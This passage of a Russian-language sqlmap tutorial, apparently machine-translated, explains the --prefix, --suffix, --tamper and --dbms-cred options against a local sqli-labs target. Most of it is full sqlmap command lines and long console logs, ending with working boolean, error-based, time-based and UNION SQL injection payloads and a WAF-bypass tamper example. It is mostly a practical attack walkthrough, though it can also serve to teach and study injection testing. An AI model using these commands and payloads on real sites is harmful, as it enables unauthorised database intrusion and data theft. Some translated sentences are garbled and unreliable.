Payload: id=atUzqr' UNION ALL SELECT NULL,NULL,CONCAT(0x71626b7171,0x6765636e6d4f5655424e4870554575704574706c785866526a79697964754e774c6278726a4b6872,0x71706b7871)-- -,
означает принудительное использование случайных строкatUzqrТестировать.
4. Расположение пользовательской загрузки для инъекции Sqlmap
В некоторых случаях уязвимые параметры могут быть использованы только тогда, когда пользователь указывает конкретный суффикс, который будет прикреплен к введенной нагрузке.
Когда пользователь уже знает синтаксис запроса и хочет обнаружить и использовать SQL-инъекцию, напрямую указав префикс и суффикс внедренной полезной нагрузки, пригодятся следующие параметры:
- –prefix
Установить префикс полезной нагрузки SQL-инъекции - –suffix
Установить суффикс полезной нагрузки SQL-инъекции
$query = "SELECT * FROM users WHERE id=('.$_GET['id'].') LIMIT 0, 1";
python sqlmap.py -u "http://ip/sqlmap/mysql/get_str_brackets.php
?id=1" -p id --prefix "')" --suffix " AND ('abc'='abc"
# Два приведенных выше предложения эквивалентны
$query = "SELECT * FROM users WHERE id=('1') <PAYLOAD> AND ('abc'='abc') LIMIT 0, 1";
провести тестирование:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 -p id --prefix "')" --suffix " AND ('abc'='abc"
Распечатать
___
__H__
___ ___[.]_____ ___ ___ {1.4.2.31#dev}
|_ -| . [.] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 10:38:09 /2020-03-01/
[10:38:09] [INFO] testing connection to the target URL
[10:38:09] [INFO] checking if the target is protected by some kind of WAF/IPS
[10:38:09] [INFO] testing if the target URL content is stable
[10:38:10] [INFO] target URL content is stable
[10:38:10] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[10:38:10] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[10:38:10] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
[10:38:11] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[10:38:12] [WARNING] reflective value(s) found and filtering out
[10:38:12] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[10:38:12] [INFO] testing 'Generic inline queries'
[10:38:12] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[10:38:12] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[10:38:12] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[10:38:12] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[10:38:12] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[10:38:12] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[10:38:12] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[10:38:12] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[10:38:12] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[10:38:12] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[10:38:12] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET)'
[10:38:12] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)'
[10:38:12] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT)'
[10:38:12] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT - original value)'
[10:38:12] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int)'
[10:38:12] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int - original value)'
[10:38:12] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[10:38:12] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[10:38:12] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[10:38:12] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[10:38:12] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Stacked queries'
[10:38:12] [INFO] testing 'MySQL < 5.0 boolean-based blind - Stacked queries'
[10:38:12] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[10:38:12] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[10:38:12] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[10:38:12] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[10:38:12] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[10:38:12] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[10:38:12] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[10:38:13] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[10:38:13] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[10:38:13] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[10:38:13] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[10:38:13] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[10:38:13] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[10:38:13] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[10:38:13] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[10:38:13] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[10:38:13] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[10:38:13] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[10:38:13] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[10:38:13] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[10:38:13] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[10:38:13] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[10:38:13] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (BIGINT UNSIGNED)'
[10:38:13] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (EXP)'
[10:38:13] [INFO] testing 'MySQL >= 5.7.8 error-based - ORDER BY, GROUP BY clause (JSON_KEYS)'
[10:38:13] [INFO] testing 'MySQL >= 5.0 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[10:38:13] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)'
[10:38:13] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (UPDATEXML)'
[10:38:13] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[10:38:13] [INFO] testing 'MySQL inline queries'
[10:38:13] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[10:38:13] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[10:38:13] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[10:38:13] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[10:38:13] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[10:38:13] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[10:38:13] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[10:38:13] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP)'
[10:38:13] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP)'
[10:38:13] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP)'
[10:38:13] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP - comment)'
[10:38:13] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP - comment)'
[10:38:13] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)'
[10:38:13] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP - comment)'
[10:38:13] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query)'
[10:38:13] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (heavy query)'
[10:38:13] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query - comment)'
[10:38:13] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (heavy query - comment)'
[10:38:13] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'
[10:38:13] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (comment)'
[10:38:13] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)'
[10:38:13] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP - comment)'
[10:38:13] [INFO] testing 'MySQL AND time-based blind (ELT)'
[10:38:13] [INFO] testing 'MySQL OR time-based blind (ELT)'
[10:38:13] [INFO] testing 'MySQL AND time-based blind (ELT - comment)'
[10:38:13] [INFO] testing 'MySQL OR time-based blind (ELT - comment)'
[10:38:13] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[10:38:14] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query - comment) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[10:38:14] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace'
[10:38:14] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)'
[10:38:14] [INFO] testing 'MySQL < 5.0.12 time-based blind - Parameter replace (heavy queries)'
[10:38:14] [INFO] testing 'MySQL time-based blind - Parameter replace (bool)'
[10:38:14] [INFO] testing 'MySQL time-based blind - Parameter replace (ELT)'
[10:38:14] [INFO] testing 'MySQL time-based blind - Parameter replace (MAKE_SET)'
[10:38:14] [INFO] testing 'MySQL >= 5.0.12 time-based blind - ORDER BY, GROUP BY clause'
[10:38:14] [INFO] testing 'MySQL < 5.0.12 time-based blind - ORDER BY, GROUP BY clause (heavy query)'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n]
[10:38:15] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[10:38:15] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[10:38:15] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns'
[10:38:15] [WARNING] GET parameter 'id' does not seem to be injectable
[10:38:15] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. As heuristic test turned out positive you are strongly advised to continue on with the tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'
[*] ending @ 10:38:15 /2020-03-01/
5. Скрипт изменения настроек Sqlmap.
За исключением того, что строка в одинарных кавычках заменяется аналогичным представлением CHAR (), сама sqlmap не будет путать отправленную полезную нагрузку;
sqlmap использует сценарии вмешательства для обхода WAF и других мер защиты. Все сценарии вмешательства, поставляемые с sqlmap, можно найти в папке тампера.
При настройке позиции нагружения впрыска предлагается использовать параметр –tamper. Теперь добавьте параметры для тестирования:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-1/?id=1 -p id --prefix "')" --suffix " AND ('abc'='abc" --tamper=space2comment --banner
Распечатать
___
__H__
___ ___["]_____ ___ ___ {1.4.2.31#dev}
|_ -| . ['] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 10:46:09 /2020-03-01/
[10:46:09] [INFO] loading tamper module 'space2comment'
[10:46:09] [INFO] testing connection to the target URL
[10:46:09] [INFO] checking if the target is protected by some kind of WAF/IPS
[10:46:09] [INFO] testing if the target URL content is stable
[10:46:10] [INFO] target URL content is stable
[10:46:10] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[10:46:10] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[10:46:10] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
[10:46:12] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[10:46:12] [WARNING] reflective value(s) found and filtering out
[10:46:12] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[10:46:12] [INFO] testing 'Generic inline queries'
[10:46:12] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[10:46:12] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[10:46:12] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[10:46:12] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[10:46:12] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[10:46:12] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[10:46:12] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[10:46:13] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[10:46:13] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[10:46:13] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[10:46:13] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET)'
[10:46:13] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)'
[10:46:13] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT)'
[10:46:13] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT - original value)'
[10:46:13] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int)'
[10:46:14] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int - original value)'
[10:46:14] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[10:46:14] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[10:46:14] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[10:46:14] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[10:46:14] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Stacked queries'
[10:46:14] [INFO] testing 'MySQL < 5.0 boolean-based blind - Stacked queries'
[10:46:14] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[10:46:14] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[10:46:14] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[10:46:14] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[10:46:14] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[10:46:14] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[10:46:14] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[10:46:14] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[10:46:14] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[10:46:14] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[10:46:14] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[10:46:14] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[10:46:14] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[10:46:14] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[10:46:14] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[10:46:14] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[10:46:14] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[10:46:14] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[10:46:14] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[10:46:14] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[10:46:14] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[10:46:14] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[10:46:14] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (BIGINT UNSIGNED)'
[10:46:14] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (EXP)'
[10:46:14] [INFO] testing 'MySQL >= 5.7.8 error-based - ORDER BY, GROUP BY clause (JSON_KEYS)'
[10:46:14] [INFO] testing 'MySQL >= 5.0 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[10:46:14] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)'
[10:46:14] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (UPDATEXML)'
[10:46:14] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[10:46:14] [INFO] testing 'MySQL inline queries'
[10:46:14] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[10:46:14] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[10:46:14] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[10:46:14] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[10:46:14] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[10:46:14] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[10:46:14] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[10:46:15] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP)'
[10:46:15] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP)'
[10:46:15] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP)'
[10:46:15] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP - comment)'
[10:46:15] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP - comment)'
[10:46:15] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)'
[10:46:15] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP - comment)'
[10:46:15] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query)'
[10:46:15] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (heavy query)'
[10:46:15] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query - comment)'
[10:46:15] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (heavy query - comment)'
[10:46:15] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'
[10:46:15] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (comment)'
[10:46:15] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)'
[10:46:15] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP - comment)'
[10:46:15] [INFO] testing 'MySQL AND time-based blind (ELT)'
[10:46:15] [INFO] testing 'MySQL OR time-based blind (ELT)'
[10:46:15] [INFO] testing 'MySQL AND time-based blind (ELT - comment)'
[10:46:15] [INFO] testing 'MySQL OR time-based blind (ELT - comment)'
[10:46:15] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[10:46:15] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query - comment) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[10:46:15] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace'
[10:46:15] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)'
[10:46:15] [INFO] testing 'MySQL < 5.0.12 time-based blind - Parameter replace (heavy queries)'
[10:46:15] [INFO] testing 'MySQL time-based blind - Parameter replace (bool)'
[10:46:15] [INFO] testing 'MySQL time-based blind - Parameter replace (ELT)'
[10:46:15] [INFO] testing 'MySQL time-based blind - Parameter replace (MAKE_SET)'
[10:46:15] [INFO] testing 'MySQL >= 5.0.12 time-based blind - ORDER BY, GROUP BY clause'
[10:46:15] [INFO] testing 'MySQL < 5.0.12 time-based blind - ORDER BY, GROUP BY clause (heavy query)'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n]
[10:46:16] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[10:46:16] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[10:46:16] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns'
[10:46:16] [WARNING] GET parameter 'id' does not seem to be injectable
[10:46:16] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. As heuristic test turned out positive you are strongly advised to continue on with the tests
[*] ending @ 10:46:16 /2020-03-01/
6. Sqlmap настраивает аутентификацию СУБД.
Установите метод аутентификации СУБД с помощью следующей команды:
--dbms-cred = username:password
Эта функция на самом деле безвкусная.Если вы уже знаете имя пользователя и пароль базы данных, вам не нужно снова зондировать, просто подключитесь к базе данных напрямую.
для проверки:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-3/?id=1 --dbms-cred="root:root" --banner
Распечатать
___
__H__
___ ___[)]_____ ___ ___ {1.4.2.31#dev}
|_ -| . [,] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 10:55:37 /2020-03-01/
[10:55:37] [INFO] testing connection to the target URL
[10:55:37] [INFO] checking if the target is protected by some kind of WAF/IPS
[10:55:37] [INFO] testing if the target URL content is stable
[10:55:38] [INFO] target URL content is stable
[10:55:38] [INFO] testing if GET parameter 'id' is dynamic
[10:55:38] [INFO] GET parameter 'id' appears to be dynamic
[10:55:38] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[10:55:38] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[10:55:38] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
[10:55:39] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[10:55:40] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Your")
[10:55:40] [INFO] testing 'Generic inline queries'
[10:55:40] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[10:55:40] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[10:55:40] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[10:55:40] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[10:55:40] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[10:55:40] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[10:55:40] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[10:55:40] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[10:55:40] [INFO] testing 'MySQL inline queries'
[10:55:40] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[10:55:40] [WARNING] time-based comparison requires larger statistical model, please wait......... (done)
[10:55:40] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[10:55:40] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[10:55:40] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[10:55:40] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[10:55:40] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[10:55:40] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[10:55:50] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[10:55:50] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[10:55:50] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[10:55:50] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[10:55:50] [INFO] target URL appears to have 3 columns in query
[10:55:50] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 51 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1') AND 9058=9058 AND ('dhTu'='dhTu
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1') AND (SELECT 6167 FROM(SELECT COUNT(*),CONCAT(0x716a716a71,(SELECT (ELT(6167=6167,1))),0x716b6a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ('ETjb'='ETjb
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1') AND (SELECT 4161 FROM (SELECT(SLEEP(5)))PeGx) AND ('WPLo'='WPLo
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-2145') UNION ALL SELECT NULL,NULL,CONCAT(0x716a716a71,0x5758644165596a476969716e597763436e4c506652536466735754476a73534a6a6b7776486c6f45,0x716b6a6b71)-- -
---
[10:55:56] [INFO] the back-end DBMS is MySQL
[10:55:56] [INFO] fetching banner
[10:55:56] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
back-end DBMS: MySQL >= 5.0
banner: '5.7.26'
[10:55:56] [INFO] fetched data logged to text files under 'xxxxsqlmapoutput127.0.0.1'
[*] ending @ 10:55:56 /2020-03-01/
Пять, технические параметры внедрения sqlmap
1. sqlmap устанавливает определенную технологию SQL-инъекций
параметр:
--technique
